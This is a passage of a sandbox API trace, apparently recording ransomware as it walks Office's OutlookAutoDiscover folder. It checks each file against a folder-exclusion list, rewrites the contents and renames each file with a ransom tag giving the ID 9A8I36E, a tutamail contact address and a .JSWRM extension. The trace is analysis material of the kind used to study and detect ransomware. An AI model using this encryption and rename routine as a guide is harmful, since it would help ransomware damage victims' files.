ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x326, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="YAHOO.HK.XML", cAlternateFileName="YAHOOH~1.XML")) returned 1 [0138.106] lstrcmpiW (lpString1="YAHOO.HK.XML", lpString2=".") returned 1 [0138.106] lstrcmpiW (lpString1="YAHOO.HK.XML", lpString2="..") returned 1 [0138.106] lstrcmpiW (lpString1="YAHOO.HK.XML", lpString2="...") returned 1 [0138.106] lstrcmpiW (lpString1="YAHOO.HK.XML", lpString2="windows") returned 1 [0138.106] lstrcmpiW (lpString1="YAHOO.HK.XML", lpString2="recovery") returned 1 [0138.106] lstrcmpiW (lpString1="YAHOO.HK.XML", lpString2="perflogs") returned 1 [0138.106] lstrcmpiW (lpString1="YAHOO.HK.XML", lpString2="documents and settings") returned 1 [0138.106] lstrcmpiW (lpString1="YAHOO.HK.XML", lpString2="$RECYCLE.BIN") returned 1 [0138.106] lstrcmpiW (lpString1="YAHOO.HK.XML", lpString2="system volume information") returned 1 [0138.106] lstrcmpiW (lpString1="YAHOO.HK.XML", lpString2="msocache") returned 1 [0138.106] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.HK.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0138.106] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.HK.XML", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="YAHOO.HK.XML", lpUsedDefaultChar=0x0) returned 12 [0138.106] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.HK.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0138.106] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.HK.XML", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="YAHOO.HK.XML", lpUsedDefaultChar=0x0) returned 12 [0138.107] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0138.107] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0138.107] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\YAHOO.HK.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\yahoo.hk.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0138.107] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=806) returned 1 [0138.107] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.107] ReadFile (in: hFile=0x238, lpBuffer=0x20e550, nNumberOfBytesToRead=0x320, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesRead=0x345e89c*=0x320, lpOverlapped=0x0) returned 1 [0138.109] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.109] WriteFile (in: hFile=0x238, lpBuffer=0x20e550*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesWritten=0x345e898*=0x320, lpOverlapped=0x0) returned 1 [0138.109] CloseHandle (hObject=0x238) returned 1 [0138.109] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\YAHOO.HK.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\yahoo.hk.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\YAHOO.HK.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\yahoo.hk.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0138.110] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1c9b60b5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1c9b60b5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1c9b60b5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x32a, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="YAHOO.IE.XML", cAlternateFileName="YAHOOI~2.XML")) returned 1 [0138.110] lstrcmpiW (lpString1="YAHOO.IE.XML", lpString2=".") returned 1 [0138.110] lstrcmpiW (lpString1="YAHOO.IE.XML", lpString2="..") returned 1 [0138.110] lstrcmpiW (lpString1="YAHOO.IE.XML", lpString2="...") returned 1 [0138.110] lstrcmpiW (lpString1="YAHOO.IE.XML", lpString2="windows") returned 1 [0138.110] lstrcmpiW (lpString1="YAHOO.IE.XML", lpString2="recovery") returned 1 [0138.110] lstrcmpiW (lpString1="YAHOO.IE.XML", lpString2="perflogs") returned 1 [0138.110] lstrcmpiW (lpString1="YAHOO.IE.XML", lpString2="documents and settings") returned 1 [0138.110] lstrcmpiW (lpString1="YAHOO.IE.XML", lpString2="$RECYCLE.BIN") returned 1 [0138.110] lstrcmpiW (lpString1="YAHOO.IE.XML", lpString2="system volume information") returned 1 [0138.110] lstrcmpiW (lpString1="YAHOO.IE.XML", lpString2="msocache") returned 1 [0138.110] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.IE.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0138.110] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.IE.XML", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="YAHOO.IE.XML", lpUsedDefaultChar=0x0) returned 12 [0138.111] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.IE.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0138.111] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.IE.XML", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="YAHOO.IE.XML", lpUsedDefaultChar=0x0) returned 12 [0138.111] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0138.111] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0138.111] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\YAHOO.IE.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\yahoo.ie.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0138.112] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=810) returned 1 [0138.112] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.112] ReadFile (in: hFile=0x238, lpBuffer=0x20e550, nNumberOfBytesToRead=0x320, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesRead=0x345e89c*=0x320, lpOverlapped=0x0) returned 1 [0138.114] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.114] WriteFile (in: hFile=0x238, lpBuffer=0x20e550*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesWritten=0x345e898*=0x320, lpOverlapped=0x0) returned 1 [0138.114] CloseHandle (hObject=0x238) returned 1 [0138.117] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\YAHOO.IE.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\yahoo.ie.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\YAHOO.IE.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\yahoo.ie.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0138.118] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1c9b60b5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1c9b60b5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1c9b60b5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x324, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="YAHOO.IT.XML", cAlternateFileName="YAHOOI~1.XML")) returned 1 [0138.118] lstrcmpiW (lpString1="YAHOO.IT.XML", lpString2=".") returned 1 [0138.118] lstrcmpiW (lpString1="YAHOO.IT.XML", lpString2="..") returned 1 [0138.118] lstrcmpiW (lpString1="YAHOO.IT.XML", lpString2="...") returned 1 [0138.118] lstrcmpiW (lpString1="YAHOO.IT.XML", lpString2="windows") returned 1 [0138.118] lstrcmpiW (lpString1="YAHOO.IT.XML", lpString2="recovery") returned 1 [0138.118] lstrcmpiW (lpString1="YAHOO.IT.XML", lpString2="perflogs") returned 1 [0138.118] lstrcmpiW (lpString1="YAHOO.IT.XML", lpString2="documents and settings") returned 1 [0138.118] lstrcmpiW (lpString1="YAHOO.IT.XML", lpString2="$RECYCLE.BIN") returned 1 [0138.118] lstrcmpiW (lpString1="YAHOO.IT.XML", lpString2="system volume information") returned 1 [0138.118] lstrcmpiW (lpString1="YAHOO.IT.XML", lpString2="msocache") returned 1 [0138.118] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.IT.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0138.118] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.IT.XML", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="YAHOO.IT.XML", lpUsedDefaultChar=0x0) returned 12 [0138.118] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.IT.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0138.118] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.IT.XML", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="YAHOO.IT.XML", lpUsedDefaultChar=0x0) returned 12 [0138.118] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0138.118] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0138.118] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\YAHOO.IT.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\yahoo.it.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0138.119] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=804) returned 1 [0138.119] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.119] ReadFile (in: hFile=0x238, lpBuffer=0x20e550, nNumberOfBytesToRead=0x320, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesRead=0x345e89c*=0x320, lpOverlapped=0x0) returned 1 [0138.121] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.121] WriteFile (in: hFile=0x238, lpBuffer=0x20e550*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesWritten=0x345e898*=0x320, lpOverlapped=0x0) returned 1 [0138.121] CloseHandle (hObject=0x238) returned 1 [0138.121] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\YAHOO.IT.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\yahoo.it.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\YAHOO.IT.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\yahoo.it.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0138.122] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1c9b60b5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1c9b60b5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1c9b60b5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x331, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="YAHOO.JP.XML", cAlternateFileName="YAHOOJ~1.XML")) returned 1 [0138.122] lstrcmpiW (lpString1="YAHOO.JP.XML", lpString2=".") returned 1 [0138.122] lstrcmpiW (lpString1="YAHOO.JP.XML", lpString2="..") returned 1 [0138.122] lstrcmpiW (lpString1="YAHOO.JP.XML", lpString2="...") returned 1 [0138.122] lstrcmpiW (lpString1="YAHOO.JP.XML", lpString2="windows") returned 1 [0138.122] lstrcmpiW (lpString1="YAHOO.JP.XML", lpString2="recovery") returned 1 [0138.122] lstrcmpiW (lpString1="YAHOO.JP.XML", lpString2="perflogs") returned 1 [0138.122] lstrcmpiW (lpString1="YAHOO.JP.XML", lpString2="documents and settings") returned 1 [0138.122] lstrcmpiW (lpString1="YAHOO.JP.XML", lpString2="$RECYCLE.BIN") returned 1 [0138.122] lstrcmpiW (lpString1="YAHOO.JP.XML", lpString2="system volume information") returned 1 [0138.122] lstrcmpiW (lpString1="YAHOO.JP.XML", lpString2="msocache") returned 1 [0138.122] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.JP.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0138.122] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.JP.XML", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="YAHOO.JP.XML", lpUsedDefaultChar=0x0) returned 12 [0138.122] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.JP.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0138.122] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.JP.XML", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="YAHOO.JP.XML", lpUsedDefaultChar=0x0) returned 12 [0138.122] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0138.122] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0138.122] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\YAHOO.JP.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\yahoo.jp.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0138.123] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=817) returned 1 [0138.123] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.123] ReadFile (in: hFile=0x238, lpBuffer=0x20e550, nNumberOfBytesToRead=0x330, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesRead=0x345e89c*=0x330, lpOverlapped=0x0) returned 1 [0138.125] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.125] WriteFile (in: hFile=0x238, lpBuffer=0x20e550*, nNumberOfBytesToWrite=0x330, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesWritten=0x345e898*=0x330, lpOverlapped=0x0) returned 1 [0138.125] CloseHandle (hObject=0x238) returned 1 [0138.125] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\YAHOO.JP.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\yahoo.jp.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\YAHOO.JP.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\yahoo.jp.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0138.126] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1c9b60b5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1c9b60b5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1c9b60b5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x326, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="YAHOO.NO.XML", cAlternateFileName="YAHOON~1.XML")) returned 1 [0138.126] lstrcmpiW (lpString1="YAHOO.NO.XML", lpString2=".") returned 1 [0138.126] lstrcmpiW (lpString1="YAHOO.NO.XML", lpString2="..") returned 1 [0138.126] lstrcmpiW (lpString1="YAHOO.NO.XML", lpString2="...") returned 1 [0138.126] lstrcmpiW (lpString1="YAHOO.NO.XML", lpString2="windows") returned 1 [0138.126] lstrcmpiW (lpString1="YAHOO.NO.XML", lpString2="recovery") returned 1 [0138.126] lstrcmpiW (lpString1="YAHOO.NO.XML", lpString2="perflogs") returned 1 [0138.127] lstrcmpiW (lpString1="YAHOO.NO.XML", lpString2="documents and settings") returned 1 [0138.127] lstrcmpiW (lpString1="YAHOO.NO.XML", lpString2="$RECYCLE.BIN") returned 1 [0138.127] lstrcmpiW (lpString1="YAHOO.NO.XML", lpString2="system volume information") returned 1 [0138.127] lstrcmpiW (lpString1="YAHOO.NO.XML", lpString2="msocache") returned 1 [0138.127] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.NO.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0138.127] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.NO.XML", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="YAHOO.NO.XML", lpUsedDefaultChar=0x0) returned 12 [0138.127] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.NO.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0138.127] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.NO.XML", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="YAHOO.NO.XML", lpUsedDefaultChar=0x0) returned 12 [0138.127] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0138.127] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0138.127] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\YAHOO.NO.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\yahoo.no.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0138.128] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=806) returned 1 [0138.128] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.128] ReadFile (in: hFile=0x238, lpBuffer=0x20e550, nNumberOfBytesToRead=0x320, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesRead=0x345e89c*=0x320, lpOverlapped=0x0) returned 1 [0138.129] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.129] WriteFile (in: hFile=0x238, lpBuffer=0x20e550*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesWritten=0x345e898*=0x320, lpOverlapped=0x0) returned 1 [0138.129] CloseHandle (hObject=0x238) returned 1 [0138.129] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\YAHOO.NO.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\yahoo.no.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\YAHOO.NO.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\yahoo.no.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0138.130] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1c98fe3e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1c98fe3e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1c9b60b5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x326, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="YAHOO.PL.XML", cAlternateFileName="YAHOOP~1.XML")) returned 1 [0138.130] lstrcmpiW (lpString1="YAHOO.PL.XML", lpString2=".") returned 1 [0138.130] lstrcmpiW (lpString1="YAHOO.PL.XML", lpString2="..") returned 1 [0138.130] lstrcmpiW (lpString1="YAHOO.PL.XML", lpString2="...") returned 1 [0138.131] lstrcmpiW (lpString1="YAHOO.PL.XML", lpString2="windows") returned 1 [0138.131] lstrcmpiW (lpString1="YAHOO.PL.XML", lpString2="recovery") returned 1 [0138.131] lstrcmpiW (lpString1="YAHOO.PL.XML", lpString2="perflogs") returned 1 [0138.131] lstrcmpiW (lpString1="YAHOO.PL.XML", lpString2="documents and settings") returned 1 [0138.131] lstrcmpiW (lpString1="YAHOO.PL.XML", lpString2="$RECYCLE.BIN") returned 1 [0138.131] lstrcmpiW (lpString1="YAHOO.PL.XML", lpString2="system volume information") returned 1 [0138.131] lstrcmpiW (lpString1="YAHOO.PL.XML", lpString2="msocache") returned 1 [0138.131] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.PL.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, 